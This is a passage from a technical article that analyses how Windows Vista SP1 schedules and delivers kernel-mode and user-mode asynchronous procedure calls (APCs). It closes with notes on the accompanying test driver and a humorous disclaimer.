however, this function calls nt!KiDeferredReadyThread  for each thread  in the deferred ready list , 
assigning it to a processor. Some of these threads may be assigned to a processor which is currently 
executing a nother  thread with a lower priority of the one being assigned. If this is the ca se, the f ormer 
thread must be preempted , thus, nt!KiDeferredReadyThread  sends an IPI (interprocessor interrupt) to 
the chosen processor. It may also occur that nt!KiDeferredReadyThread  assignes the awakened 
thread to the executing processor (the one execut ing nt!  KeInsertQueueApc ) and determines that the 
current thread must be preempted . This is taken care of by the remainder of nt!KiExitDispatcher , 
which, in this case, calls nt!KiSwapContext  (which in turn calls nt!SwapContext ). 
The overall effect is that the thread dispatcher re -assesses which thread s are going to run, to account 
for the threads awakened by DPCs.  
Delivery  
After nt!KeInsertQueueApc has run, nt!KiDeliverApc  will eventually be called to process the APC.  
This may happen because an APC software  interrupt has been requested , or because 
nt!SwapContext detects it is  resuming a thread with ApcState. KernelApcPending  set and 
SpecialApcDisable clear.  
In the latter situation, nt!SwapContext  check s the IRQL at which the thread about to be resumed was 
running, when it was suspended. This IRQL value is stored on the thread stack, so  nt!SwapContext 
pops it from there while restoring the thread context.  
The popped IRQL can be either PASSIVE or APC (a thread can’t be preempted when is running 
above APC). If nt!SwapContext  finds out that the thread is returning to PASSIVE, returns 1, which 
tells its caller to call nt!KiDeliverApc  right away . If, on the other hand, the thread is returning to APC, 
nt!SwapContext  returns 0,  but before leaving  request s an APC interr upt. When the IRQL will drop to 
PASSIVE , the APC interrupt will fire and nt!KiDeliverApc  will be called.  
The APC int errupt  may still  fire after the thread has  been preempted  again . This is not a problem, 
however, because the next time nt!SwapContext  will resume  the thread , the process will be repeated.  
20 
 nt!KiDeliverApc  is called at APC IRQL and  takes three stack parameters. We will call them  
PreviousMode, Reserved and TrapFrame , as in [1] . For kernel mode APCs only the first one is used 
and it is set to Kern elMode (i. e. 0) to tell nt!KiDeliverApc  it is being invoked to deliver kernel mode 
APCs.   
One of the first things nt!KiDeliverApc  does, is copying into a local the address of the _KPROCESS 
for the current process context (_KTHREAD.ApcState.Process). Befor e leaving, it will compare the 
saved value with the current one, taken again from _KTHREAD and, if they are not the same, it will 
bring the system down  with the bug check code INVALID_PROCESS_ATTACH_ATTEMPT . 
Effect of _KTHREAD.SpecialApcDisable Being Set  
nt!KiDeliverApc  begins by zeroing ApcState.KernelApcPending and , only afterwards , it checks  if 
_KTHREAD.SpecialApcDisable is set. If this is the case, it returns without dispatching APCs and 
leaving ApcState.KernelApcPending set to 0.  
This is an important i ssue : when KernelApcPending is 0, nt!SwapContext does not call 
nt!KiDeliverApc  anymore. Even if _KTHREAD.SpecialApcDisable is  later cleared, the pending APC s 
are not delivered until some one sets KernelApcPending again (or requests an APC interrupt).  
The te st driver accompanying this art icle demonstrate this behaviour, in the ApcDisableTest  function.  
This function initializes a special kernel mode APC, then chains it to the APC list and sets 
_KTHREAD.ApcState.KernelApcPending, without calling nt!KiInsertQueu eApc  (it updates these data 
structures directly). It also sets _KTHREAD.SpecialApcDisable.  
ApcDisableTest  then invokes a wait function , to ensure thread dispatching takes place and 
nt!SwapContext gets a chance to run for the thread.  
The APC KernelRoutine w rites a message on the debugger console, so we see that the APC is not 
delive red during the wait, due to SpecialApcDisable being set.  
After the wait, ApcDisableTest shows that KernelApcPending is still set, which is consistent with the 
fact that nt!KiDeliv erApc  is not even called for this thread.  
ApcDisableTest goes on by expli citly calling nt!KiDeliverApc. W e see that the APC is not delivered, 
but after nt!KiDeliverApc returns, KernelApcPending is clear. We have thus reached the situation 
where, until some one sets it again, the pending APC will not be delivered.  
This is confirmed by the fact that ApcDisableTest clears SpecialApcDisable, then waits for a few 
seconds; during the wait, the APC is not delivered.  
Finally, ApcDisableTest, sets KernelApcPending an d waits again. We see the KernelRoutine 
message telling us that the APC has been delivered.  
This test also confirms that when KernelApcPending is set, APC delivery occurs without even 
requesting the APC interrupt, providing that APCs are not disabled.  
Norm ally, when SpecialApcDisable is set, nt!KiDeliverApc  is not  even  called . For instance, 
nt!SwapContext  does not trigger nt!KiDeliverApc  in this situation.  The test confirmed this, when we 
saw that KernelApcPending was still set after the firs t wait. 
However , the fact that nt!KiDeliverApc  bothers to check SpecialApcDisable suggests that this 
scenario could happen; when this is the case,  the pending APCs will stay there until something sets 
again ApcState.KernelApcPending.  
21 
 In a previous section titled The SpecialApcDisable Flag , we saw a behaviour of the functions which 
clear SpecialApcDisable consistent with how the flag is treated here. These functions check whether 
there are kernel APCs pending by ins pecting t he list, not by checking KernelApcPending. This 
accounts for the fact that this flag might have been cleared by nt!KiDeliverApc. Furthermore, these 
functions call nt!KiCheckForKernelApcDelivery , which either call s nt!KiDeliverApc or raise s an APC 
interrupt . In the latter case, the function sets KernelApcPending  before requesting the interrupt. The 
logic behind  this is that when SpecialApcDisable is cleared, KernelApcPending is set for good 
measure, in case it had been cleared by nt!KiDeliverApc. As a final note, when 
nt!KiCheckForKernelApcDelivery  calls nt!KiDeliverApc directly, does not bother to set 
KernelApcPending, because it’s useless: this flag is  used when we want  nt!SwapContext to call 
nt!KiDeliverApc  at some later time  and the latter clears it in it s early stages.  
Kernel APC Deli very W hen SpecialApcDisable Is Clear  
nt!KiDeliverApc  goes on by checking whether there really are APCs in the list for kernel mode ones 
(ApcState.ApcListHead[KernelMode] ). If the  list is empty, it just returns (assuming it ha d been invoked 
with PreviousMode = KernelMode).  
Otherwise, the function acquires the spinlock stored at _KTHREAD. ApcQueueLock  (for the current 
thread) and makes sure  that there  still are pending APCs, leaving if there are none.  
It then goes on by copying i nto local stack variables KernelRoutine, NormalRoutine, NormalContext, 
SystemArgument1, SystemArgument2.  
If this is a special APC, it is then unchained from the list; afterwards the spinlock is released and the 
Kernel Routine called, with pointers to the lo cal copies of the APC parameters.  
Since the APC has already been unchained and the pointers passed to the KernelRoutine are for 
local copies of the APC data, the KernelRoutine can safely deallocate the _KAPC instance, if it wants 
to do so.  
Aftewards, the k ernel APC list is checked  again , to see if there are any more waiting APCs and, if so, 
the process repeats itself from the spinlock acquisition.  
Conversely, if a regular kernel mode APC is found, before unchaining it from the list  
_KTHREAD.KernelApcInProgr ess and _KTHREAD.KernelApcDisable are checked: if etiher one is not 
0, the function terminates.  We must remember that nt!KiDeliverApc  can assume there are no more 
special APCs when it  finds a regular one , because these  are inserted in th e list behind  the special  
ones, so the function can terminate.  
We will resume this point later, but the overall logic is easier to understand if we  first look at what 
happens when these two flags are clear.  
As is the case for a special APC, the regular one is unchained from the list , the spinlock is released  
and the KernelRoutine is called with addresses of local copies of the APC  parameters.  Indeed,  
regular APCs have a KernelRoutine, just like special ones.  
When the KernelRoutine returns, nt!KiDeliverApc  checks to see whethe r it has zeroed the 
NormalRoutine pointer (KernelRoutine received the pointer address, so it is free to modify it). If this 
happened, nt!KiDeliverApc  loops to the next APC in the list, so for this one  nothing more is done.  
Otherwise, nt!KiDeliverApc  sets _ KTHREAD.KernelApcInProgress ( one of the two flags tested 
before), lowers the IRQL to PASSIVE, and calls the NormalRoutine passing it NormalContext, 
SystemArgument1 and SystemArgument2.  Interestingly, the address of NormalRoutine is taken from 
22 
 the same poin ter passed to KernelRoutine, which, therefore, has a chan ce to change the pointer and 
cause  a different NormalRoutine  to be executed.  
When NormalRoutine returns, nt!KiDeliverApc  raises the IRQL back to APC, clears 
KernelApcInProgress  and loop to the next A PC, leaving if there are none.  
Let’s focus back on the two checks on KernelApcDisable and KernelApcInProgress.  
If either is found set, nt!KiDeliverApc  terminates with ApcState. KernelApcPending  clear, thus APC 
delivery won’t happen again until someone sets it. 
If this happens because KernelApcDisable was set, it mea ns that the code which clears the flag  will 
probably take care of setting ApcState.KernelApcPending again.  
If this happens because KernelApcInProgress was set, the scenario is a bit different.  Given that  
KernelApcInProgress is set by this very function before calling the APC normal routine , when  we find 
it set, it means we have re -entered nt!KiDeliverApc  while it was in the middle of  a normal  APC 
dispatching.  
We therefore return from this nested ca ll to nt!KiDeliverApc, the outer call will at some point be 
resumed and the APC dispatching loop will go on. Put in other words, leaving KernelApcPending 
clear does not matter, because we are still in the middle  of nt!KiDeliverApc  – the outer call.  
But how  come that nt!KiDeliverApc  can be re -entered? Why is not protected by the IRQL rules? After 
all, the code invoking nt!KiDeliverApc  does so only when the IRQL is below APC and this should 
prevent re -entrancy issues.  
The point is that, as we just saw, nt!KiD eliverApc  lowers the IRQL to PASSIVE to call the 
NormalRoutine, therefore unprotecting itself from nested APC interrupts. When the NormalRoutine 
executes at PASSIVE anything  can happen: there is no IRQL protection in place.  
In this nt!KiDeliverApc  is quite  special: it is not so common for a function to lower the IRQL below  the 
value at which it is called. Normally, a function will perhaps raise it, then bring it back to its value. 
Setting the IRQL  below the initial value means unmasking interrupts the calle r of the function migth 
not expect . Apparently, Windows is built so that nt!KiDeliverApc  is always called in situations where 
bringing the IRQL all the way down to PASSIVE does no harm.  
Given how this works,  the KernelApcInProgress  flag looks like a way to  protect NormalRoutines from 
re-entrancy: even thou gh the IRQL is not protecting them (they run at PASSIVE, after all), 
nt!KiDeliverApc  does. A NormalRoutine writer can safely assume his routine will not be re -entered in 
the context of the same thread. It is non etheless possible for it to be re -entered in the context of 
another thread, because at PASSIVE thread dispatching is free to occur  and ApcState.  
KernelApcInProgress  is a per -thread flag . 
A further point of interest is that KernelApcDisable is checked  in the middle of the dispatching loop, 
which means an APC KernelRoutine or NormalRoutine could conceivably set it and cause the loop to 
be aborted.  
Finally, it’s worth noting  that special APCs are chained ahead of regular ones, therefore, when we find 
the first regular APC, which might cause the loop to be aborted because of a set KernelApcDisable, 
all the special APCs have already been processed.  
23 
 Special V s. Regular Kernel APCs  
On the subject of how regular APCs are limited, nt!KiDeliverApc  has the final say: it is this function 
which decides when such an APC will be delivered.  
The function enforces the following rules : 
 When  the NormalRoutine of  a regular APC is in progress, (ApcState. KernelApcInProgress  != 
0), other regular APCs are not delivered  to the s ame thread . Even if the thread catches an 
APC interrupt and enters nt!KiDeliverApc . 
 When ApcState.KernelApcDisable !=0, re gular APCs are not delivered.   
If nt!KiDeliverApc  is called with ApcState.KernelApcDisab le != 0, KernelApcPending is left 
zeroed, whic h prevents further calls to the function on context switch es. nt!KiDeliverApc  will 
be called again when KernelApcPending is set, perhaps by queuing another APC.  
 Regular APC s have both a KernelRoutine and a No rmalRoutine. The first is called  at APC 
IRQL, th e second at PASSIVE . 
The KernelRoutine is called first and can change the address of the NormalRoutine that will 
be invoked  or avoid the call altogether, by zeroing the NormalRoutine pointer.  
Furthermore, the logic of nt!KiInsertQueueApc  implies that:  
 When  a regular APC is queued to a wating thread, the thread is not awakened if:  
o The NormalRoutine of a nother  regular APC is in progress on the thread 
(ApcState. KernelApcInProgress  != 0) 
This implies that the NormalRoutine can enter a wating state and know for sure that 
the thread will not service other regular APC s during the wait.  
o KernelApcDisable has a non -zero value.  
It is interesting to note how the DDK states that the conditions under wh ich a waiting thread receives 
regular APCs are:  
“thread not already in  an APC, thread not in a critical section ” 
Thus, “in a critical section” KernelApcDisable is set to a non -zero value.  
User Mode APC s 
This section analyzes the scheduling  and delivery of  user mode APCs.  
The main difference between these APCs and kernel mode  ones is that their NormalR outine is 
executed in user mode, so t he APC implementation  has to  switch to ring 3 before calling 
NormalRoutine.  
Scheduling  
As fo r kernel mode APCs, the scheduling performed by nt!KiInsertQueueApc  can be split into two 
main steps : linking the _KAPC to a list of pending APCs and updating control variables for the target 
thread so that it will process the waiting APC, when the right conditions apply.  
24 
 Linking _KAPC to Its L ist 
The APC environment is sel ected in the same way this is d one for kernel mode APCs: here too  
ApcStateIndex = 3 specifies  the environment which is current when nt!KiInsertQueueApc  is executing.  
The APC is then chained to the tail of the list for the selected environment (except for the special user 
APC detailed l ater). Note that each enviro nment has two distinct lists: one for kernel mode APCs, 
another for user mode ones.  
Directing The Thread to Execute The APC  
As for kernel mode APCs, this stage begins  by checking whether the APC is for the current 
environment a nd, in case it’s not, the function leaves. User mode APCs directed at another 
environment remain pending, probably until the next environment switch.  
If the APC is for the current thread, the result is the same: nt!KiInsertQueueApc  simply exits. This 
makes  sense if we recall when user mode APC s are dispatched: when a thread is waiting and 
alertable. Since the current thread is executing nt!KiInsertQueueApc , it is obviously not waiting, so 
nothing can be done at this time.  
This leads us to a question: what i f this thread  attempts to  enter an alertable wait after 
nt!KiInsertQueueApc has return ed? It’s likely that the wait functions will have to account for this 
possibility, otherwise the thread cou ld be left waiting alertably, yet  with pending APCs. We will se e in 
a later section how this scenario is handled.  
If the APC is for another thread, nt!KiInsertQueueApc  goes on  by acquiring the spinlock at  
LockQueue in the _K PRCB of the executing processor , and checking whether the target thread is in 
WAIT state. For any other thread state, nt!KiInsertQueueApc  leaves. This again shows how  user 
APCs have an immediate effect only if the target thread is waiting, otherwise they are left pending . 
If, however, the thread is waiting, the WaitMode field is compared with 1: i f it has a different value, 
nt!KiInsertQueueApc  stops. Indeed, the DDK states that a waiting thread receives user mode APCs 
only if it is waiting in UserMode, which is defined to be 1 in wdm.h, so the compare we are seeing 
implement s this criteria.  
The nex t step is to check whether the Alertable bit  in the MiscFlags member  of _KTHREAD is set: if 
this is true,  _KTHREAD.UserApcPending is set to 1and  the thread is awakened by calling 
nt!KiUnwaitThread , with edx set to 0c0h (STATUS_USER_APC); nt!KiUnwaitThrea d also receives the 
priority boost passed to nt!KiInsertQueueApc , which will be applied to the awakened thread.  
The steps above mean that when the thread is waiting in user mode and alertable, it is awakened with 
UserApcPending set to 1.  As we are about to  see, this flag will trigger the APC delivery process.  
nt!PsExitSpecialApc  and The Special User APC  
nt!KiInsertQueueApc  treats in a special way a user mode APC whose KernelRoutine is  
nt!PsExitSpecialApc .  
First of all,  sets _KTHREAD.ApcState.UserApcPending  to 1, regardless of  the state of the thread.  
We will see later how this variable is the one which diverts the thread from its execution path when it 
enters user mode, sending it to deliver user APCs. However, for other user  APCs, this variable is set 
only if the thread is found in an alertable wait state and is awakened . For this particular KernelMode 
routine  instead , the variable is set regardless of the thread state, which  means it  will be hijacked as 
soon as it will switch  from kernel mode to user mode . 
25 
 Thus,  this APC is allowed to asynchronously break into the target thread, something user APCs can’t 
normally do.  
Furthermore, for this KernelRoutine, the APC is queued at the head of the list of pending user APCs, 
while APCs for other Ker nelRoutines  are chained in FIFO order . 
Finally , for this APC , if nt!KiInsertQueueApc  finds out that the target thread  is in WAIT with WaitMode 
= User Mode , it awakens the thread, regardless of  the value of the Alertable bit. Remember that  with 
regular user mode APCs, the thread is awakened only if the bit is set.  
These special steps allow the APC to be delivered as soon as possible: if the thread can be 
awakened without breaking kernel mode rules (e. g., a wait with WaitMode = KernelMode cannot be 
aborted, no matter what),  it is. At any rate, having UserApcPending set, the thread will service its 
APCs as soon as it goes from kernel mode to user mode.  
Given that Ps is the prefix for process support routine, nt!PsExitSpecialApc  looks like a function 
involved in terminating a process, so  perhaps  it receive s this  special treatment to signal in a timely 
fashion to a process that i t must terminate.  
Triggering Thread Dispatching  
As is the case for kernel mode APCs, nt!KiInsertQueueApc  returns to nt!Ke InsertQueueApc , which 
invokes t he thread dispatcher. The code of nt!Ke InsertQueueApc  is the same for both kernel and user 
APCs and it has already been covered in the corresponding section for kernel mode ones.  
Delivery  
nt!KiDeliverApc  Invocation  
We saw in the previous section that for u ser mode APC no interrupt is requested, nor is 
KernelApcPending set, so we must ask ourselves how will nt!KiDeliverApc be invoked.  
To answer this question, we must mention a few things about the  system service dispatcher.  
Many functions of the Windows API need to call executive services to do their job and do so by  calling 
the system service dispatcher, whose task is to switch the processor to ring 0 and figure out the 
service routine to call.  
The SSD switches to ring 0 by  executing a sysenter instruction, which transfer s control to 
nt!KiFastCallEntry . Befor sysenter -ing, eax is loade d with a number identifying the executive service 
to be called.  
nt!KiFastCallEntry  calls the relevant executive service routine, then resumes ring 3 execution by 
means of a syse xit instruction.  
Before doing this, nt!KiFastCallEntry  checks whether _KTHREAD.ApcState. UserApcPending  is set 
and, if so, calls nt!Ki DeliverApc to deliver user APCs,  before resuming the user mode execution 
context.  
Thus,  if UserApcPending is set, it hijack es the thread when it is about to return to ring 3.  
For instance, a thread which entered an alertable wait state  from user mode,  by calling 
WaitForSingleObjectEx, resulted in the invocation of  an executive service. When the thread  is 
unwaited by nt!KiInser tQueueApc , it returns to ring 3 through the SSD code described above and is 
then sent to process user APCs, before finally returning from the wait fuction.  
26 
 Effect o f User Mode APCs on Kernel Wait Functions  
The previous section  brings us to an interesting d etail about the documented DDK wait functions.  
Consider, for instance, the DDK help about KeWaitForSingleObject : among the possible return 
values, STATUS_USER_APC is listed with the following description:  
“The wait was interrupted to deliver a user asynchr onous procedure call (APC) to the calling thread. ” 
The point is, the user APC has not yet  been delivered: it will be, when the thread will re -enter user 
mode.  
Thus, when KeWaitForSingleObject returns, the APC has merely aborted the wait, but it is still t o be 
delivered. The wait has  been aborted so that the thread  can return to user mode and, thanks to 
UserApcPending being set, deliver the APC.  
If the thread were to stay in kernel mode, for instance by entering  another  wait, the APC would remain 
pending.  
User Mode  APC Delivery Test in The Sample Driver  
The sample driver accompanying this article shows this behaviour, by testing different wait cases. The 
driver dispatch function for this test is called ApcUserModeTest.  
This function creates a separate thread  which will queue the APC to the one executing it, then enters 
an alertable user -mode wait. The APC -requesting thread executes a function named ApcRequester.  
When ApcRequester queue the APC to the original thread, the latter retu rns from 
KeWaitForSingleObj ect with STATUS_USER_APC. However, the APC has not yet been delivered 
and we can confirm this, because the APC kernel routine, when called, writes “ Hello from the USER 
APC kernel routine ” on the debugger console.  We will see that this happens only after 
ApcUserModeTest has returned to user mode.  
Before returning, ApcUserModeTest  shows  a few more interesting cases. First, it   tries again to enter 
an alertable user -mode wait with KeWaitForSingleObject.  However, the function immediately  returns 
with STATUS_USE R_APC.  Thus, once a thread has user APCs pending, it simply can’t enter such a 
wait. 
It then tries a non -alertable user mode wait and, interesting ly, the result is the same. This means  
alertability matters only  when APCs are requested for a thread which is  already  waiting: the thread is 
only awakened if the wait  is alertable. On the other hand, alertable or not, a thread can’t enter a user 
mode wait if it  already  has pending user APCs.  
Finally, ApcUserModeTest tries a non -alertable kernel mode  wait and this  time the thread is put to 
sleep, regardless of the pending APCs.  
After all these tests, ApcUserModeTest terminates, the thread returns to user mode and only then the 
APC is disp atched and we see the debug message from its KernelMode routine.  
Earlier, when  examining nt!KiInsertQueueApc for user APCs , we reasoned  that the wait functions  
would have had to  account for the fact that a thread could call them after APCs have been queued for 
it. This follows from the fact  that, for not -waiting threads, nt!KiInsert QueueApc  does nothing more than  
chain ing the APCs to its list; the target thread is thus free to  attempt to enter an alertable user mode 
wait after this . 
27 
 Kernel mode waiting functions handle this case simply by setting 
_KTHREAD.ApcState.UserApcPending to 1  and returning immediately STATUS_USER_APC. Thus, 
the thread can immediately return to user mode and, in doing this, will deliver the APCs thanks to the 
set UserApcPending.  
The sample driver shows this in his ApcUserModeTest2 function, which confirms  that, before 
attempting the wait, UserApcPending is clear, then  when  the wait function (KeWaitForSingleObject in 
this case) is called , it immediately returns STATUS_USER_APC and UserApcPending is  found  set. 
Conclusions on User APC V s. Kernel Wait Functions  
The DDK help explains how waits initiated by kernel wait functions like KeWaitForSingleObject are 
not aborted for kernel APC: the APCs are delivered, if the right conditions apply, then the thread 
resumes its wait. On the other hand, the same documentation details how these wait functions abort 
the wait for user APCs.  
Now we understand why the wait is aborted: inside the wait function, the thread does not  deliver user 
APCs. Instead, it returns from the wait function, so that the code following the wait can retu rn to user 
mode, where the APCs will actually be delivered.  
This is probably done because it would be too complex to actually deliver user mode APCs while 
inside the wait function. After all, we are talking about user APCs, whose NormalRoutine must be 
called in user mode. The kernel would have to somehow switch to user mode, deliver the APC, then 
switch back to kernel mode and resume the wait function – not an easy feat.  
The implication is that kernel mode code (e. g. a driver) must  “know” this , i. e. it mu st be written  to 
handle the STATUS_USER_APC return code and the fact that  it must actually return to ring 3  to allow 
user APCs to be serviced.  
On the other hand, kernel mode APCs can be delivered without aborting the wait functions, because 
they don’t requ ire a switch from kernel mode to user mode.  
nt!KiD eliverApc for User APCs  
We are now going to see what happens when nt!KiDeliverApc is finally called for user APCs.  
First of all, we need to remember that it has three stack parameters: PreviousMode, Reserve d and 
TrapFrame.  
When it is called for user APCs, PreviousMode is set to UserMode, i. e. 1, and TrapFrame points to a 
_KTRAP_FRAME structure storing the ring 3 context of the thread . 
The first part of nt!KiDeliverApc does the kernel APC dispatching, regard less of the value of 
PreviousMode. In other words, whenever this function is called, it dispatches kernel mode APCs if 
there are any, then, only if  PreviousMode = UserMode, checks for user mode ones.  
All the actions explained in the section  Delivery  for kernel mode APCs are taken. If 
_KTHREAD. SpecialApcDisable  is set, neither kernel nor user APCs are delivered.  
Also, if nt!KiDeliverApc finds regular kernel mode APCs to deliver and then finds either 
KernelApcDisable or KernelA pcInProgress set, it stops delivering APCs and returns, without 
processing user APCs.  
However, when all the kernel APCs have been delivered and their list is empty, nt!KiDeliverApc sets 
to work on user APCs.  
28 
 First of all, it checks _KTHREAD.ApcState.UserAp cPending: if it is equal to 0, the function returns.  
Otherwise, nt!KiDeliverApc  acquires the spinlock stored at _KTHREAD. ApcQueueLock .  
Then it sets UserApcPending to 0 and copies to local s the APC parameters KernelRoutine, 
NormalRoutine, NormalContext, S ystemArgument1, SystemArgument2.  Afterward s, it unchains the 
APC from its list. 
Now the _KAPC structure cannot be reached by anyone else, because it is not in the list anymore, so 
nt!KiDeliverApc releases the spinlock.  
After that, the kernel routine is cal led with the addresses of  NormalRoutine, NormalContext, 
SystemARgument1 and SystemArgument2.  
When KernelRoutine returns, it may have changed the pointer to NormalRoutine, so nt!KiDeliverApc 
checks to see if it is equal to 0. Let’ see what happens when thi s is not the case, first.  
The function calls nt! KiInitializeUserApc  passing to it the input _KTRAP_FRAME address, 
NormalRoutine, NormalContext, SystemArgument1 and SystemArgument2. nt!KiInitializeUserApc  will 
alter the thread user mode context stored in th e _KTRAP_FRAME and send it to deliver the APC. 
This process will be analyzed in a later section. After this call, nt!KiDeliverApc  exits.  
We can now highlight an important detail: nt!KiDeliverApc  only delivers one user APC; it does not spin 
in a loop delive ring all the APCs in the list.  Furthemore, it leaves UserApcPending clear so, unless 
somebody else sets it again, the SSD will not call nt!KiDeliverApc  again . 
This is in apparent contradiction with the MSDN documentation about the Win32 APIs for APCs. The 
following excerpt is for QueueUserAPC:  
“When a user -mode APC is queued, the thread is not directed to call the APC function unless it is in 
an alertable state. After the thread is in an alertable state, the thread handles all pending APCs in first 
in, firs t out (FIFO) order, and the wait operation returns WAIT_IO_COMPLETION ” 
We will see how this works in a short while.  
Now, let’s go back to the point where KernelRoutine has been called, and see what happens when 
KernelRoutine zeroes the pointer to NormalRou tine: there is nothing more to do for the current APC, 
so nt!KiDeliverApc  checks whether there are other user APCs pending and, if so,  sets 
UserApcPending back to 1 , then  exits. Again, nt!KiDeliverApc  does not loop through all the user 
APCs. However, this situation is different from when the NormalRoutine runs, because 
UserApcPending  is set to 1.  
By examining the SSD code,  we see that,  after nt!KiDeliverApc  returns,  the SSD  checks  
UserApcPending and, if set, calls nt!KiDeliverApc  again. Thus, if  there are more APCs to process, 
the next one gets its turn.  
nt!KiInitializeUserApc  And The User Mode Context  
The job of  nt!KiInitializeUserApc  is to modify the user mode context of the thread so that, when it 
returns to user mode, it is hijacked to call the NormalR outine. The user mode context is stored in the 
_KTRAP_FRAME whose address is passed to nt!KiInitializeUserApc . 
To do its job, nt!KiInitializeUserApc  allocate s room for a _CONTEXT structure on the ring 3 stack, 
whose esp is stored in the _KTRAP_FRAME.  While  doing this, it probes the user mode stack with the 
documented ProbeForWrite function, to ensure it can be written to.  
29 
 If the stack is not writable, ProbeForWrite raises an exception, which is handled by 
nt!_except_handler4 . I suppose it aborts the process , but I did not analyze it.  
The _CONTEXT structure is then filled with the user mode context taken from _KTRAP_FRAME.  
nt!KiInitializeUserApc  actually reserves  some more room  on the user mode stac k, below the 
_CONTEXT structure, where it will store the foll owing data before leaving : SystemArgument2, 
SystemArgument1, NormalContext, pNormalRoutine (listed in decreasing addresses order).  
To keep things consistent, nt!KiInitializeUserApc  updates the user mode esp  into _KTRAP_FRAME  
so that it points at the beginn ing of the allocated data. This way it  is as if the new data had  been 
pushed on the stack by user mode code.  
Afterwards, it sets the ring 3 eip stored inside _KTRAP_FRAME to the address of the user mode 
function ntdll!KiUserApcDispatcher  and leaves , return ing to nt!KiDeliverApc . 
It is important to note that the now we have two values for the ring 3 eip: one inside 
_KTRAP_FRAME, which points to ntdll!KiUserApcDispatcher , the other, inside the _CONTEXT on the 
user mode stack, which has the original user mode eip. 
The eip copy inside _KTR AP_FRAME is the one which matters  when execution go es back  from 
kernel mode  to user mode, so the thread will resume ring 3 execution inside 
ntdll!KiUserApcDispatcher . The _CONTEXT left on the user mode stack will be used by 
ntdll!KiUserApcDispatcher  to resume the original user mode context later, after the NormalRoutine 
has been called.  
The picture below shows the user mode stack after nt!KiInitializeUserApc  has run:  
 
The padding is added to align the  rest of the stack to 4 bytes boundaries.  
nt!KiInitializeUserApc  returns to nt!KiDeliverApc , which in turns return to the SSD. The SSD then 
resumes user mode execution, causing ntdll!KiUserApcDispatcher  to be called.  padding  
8 free bytes  
_CONTEXT  
SystemArgument2  
 SystemArgument1  
 NormalContext  
 NormalRoutine  
 Original user 
mode  esp 
Final user mode 
esp 
30 
 User Mode APC Delivery by ntdll!KiUserA pcDispatcher  
This user mode function pops the address of NormalRoutine and calls it. NormalRoutine finds on the 
stack NormalContext, SystemArgument1 and SystemArgument2 as if they had been pushed by the 
call. 
Before actually calling the NormalRoutine, ntdll!KiUserApcDispatcher  uses the 8 free bytes on the 
user mode stack above _CONTEXT to build an exception handler registration, which is chained at  
the head of the handlers chain. This registration stores the address of 
ntdll!KiUserApcExceptionHandler , whic h will handle any exception caused by the NormalRoutine.  
When the NormalRoutine returns, ntdll!KiUserApcDispatcher  remove s the exception registration from 
the handlers chain and calls ntdll!NtContinue , which will set the user mode context from the 
_CON TEXT  structure on the stack. Since the eip value inside _CONTEXT is the original pre -APC eip, 
user mode execution will resume at the point it was before the APC was delivered.  
ntdll! NtContinu e And The User Mode Context  
ntdll!NtContinue is actually implemented  as an executive service, so it just loads into eax the service 
number  (0x37) and invokes the SSD, which, in turn will transfer control to the kernel mode function 
nt!NtContinue.  
As usually, invoking the SSD results in the creation of a _KTRAP_FRAME storing the user mode 
context. n t!NtContinue modifies this _KTRAP_FRAME so that, when returning to user mode, the 
context actually loaded will be the one from the  original  _CONTEXT  structure  passed to 
ntdll!NtContinue . 
In most cases, execution will resume insi de the user mode portion of the wait function which caused 
the APCs to be delivered in the first place.  
We are finally ready to understan d how Windows manage to deliver  all the user APC s before actually 
returning from the wait function. This is the questio n we left open at the end of the section titled 
nt!KiDeliverApc for User APCs  
After having restored the user mode context and just before returning to user mode, nt!NtContinue 
checks whether there are user mod e APCs in the thread list and, if so, sets 
_KTHREAD.ApcState.UserApcPending. It then transfers control back to the SSD.  
Thus, the SSD finds the following situation:  
 The user mode context is the original pre -APC one  
 UserApcPending is set if there still are APCs to deliver  
The thread is thus in the same situation it was, before delivering the first APC. If UserApcPending is 
set, the SSD will invoke again nt!KiDeliverApc  and the whole APC delivery process will be repeated.  
This cycle will go on until eventuall y all user mode APCs have been delivered , the SSD finds 
UserApcPending clear  and finally resum es the original user mode context.  
At first sight, this process may seem u nnecessarily complex: why have  nt!NtContinue set 
UserApcPending again instead of simply processing all the APCs inside nt!KiDeliverApc ? After all, 
this is what happens with kernel mode APCs.  
However, since user mode APC must run in, well, user mode, nt!KiDeliverApc can’t simply call them: 
it has to alter the user mode context by calling nt!KiInitializeUserApc  and the n it must allow execution 
31 
 to return to user mode , before the next APC can be dealt with . After all, there is only one 
_KTRAP_FRAME storing the user mode context, so, once it has been manipulated to deliver the first 
APC, it cannot be altered again for the second one. Instead, execution must be allowed to return to 
user mode to deliver the APC and only afterwards the process can be repeated , if there are more.  
Appendix - The Test Driver  
IMPORTANT WARNING  
The test driver which comes w ith this article does several unhortodox things and is therefore evil, 
nasty, dangerous and likely to crash the system. After consulting the most competent law firms 
around, I have been advised to include the following disclaimer:  
If you are dumb enough to  put yourself in a situation where you loose money because of my driver, 
there’s on ly one thing you can do which is even dumb er: asking me your money back . Whatsoever, 
aforementioned – there you go, any serious disclaimer worth its salt must say “whatsoeve r” and 
“aforementioned”  at least once.  
BUT, if you are willing to risk a blue screen here and there, you can reproduce the tests explained in 
this article.  
Seriously, though, the most risky test to run is the spurious interrupt test. The other ones are alm ost 
safe.  
Furthermore,  this test  works  ONLY for Windows Vista SP1 with no Windows updates  applied . It will 
crash any other version of ntoskrnl.exe . It can work on an updated Vista SP1, if the ntosk rnl.exe is still 
the original one.  
Also, the test  works onl y on a uniprocessor machine.  Before you start rummaging through your attic in 
search of that ole single core PC, remember  you can use the “ onecpu ” bcdedit datatype  to boo t with 
one cpu only, or, much safer, you can use a virtual machine.  
Driver  Package  Con tents  
The package contains both the executables and the source for the driver. It consists of a .zip file with 
two main directories: executables and sources.  
The executables are:  
 ApcTest.sys  the driver  
 TestClt.exe  the client program  
The client program ca lls the driver with the DeviceIoControl API, passing the code of the test to 
perform.  
The sources directory contains a Visual C++ Express solution.  
You don’t need to have VS installed to edit the code and build the driver. The solution projects can 
just be  regarded as subfolders of the overall source tree and all the building is done with the DDK 
build utility or the SDK nmake tool. VS can be used as a text editor and to access the various files 
through the Solution Explorer window, but this is not required . 
The solution is made up of the projects described below.  
32 
 Driver  
This project contain s the driver code. See the ReadMe.txt file for details on how to build the driver.  
TestClt  
Project containing the client to invoke the driver. See the ReadMe.txt file for  details on how to build 
the client.  
CommonFile  
Shared  files.  
Loading  And Running  The Driver  
The test client does not load the driver by itself, so some loading utility is needed.  
The one I use and I find very handy is w2k_load.exe by Sven B. Schreiber, o riginally found on the 
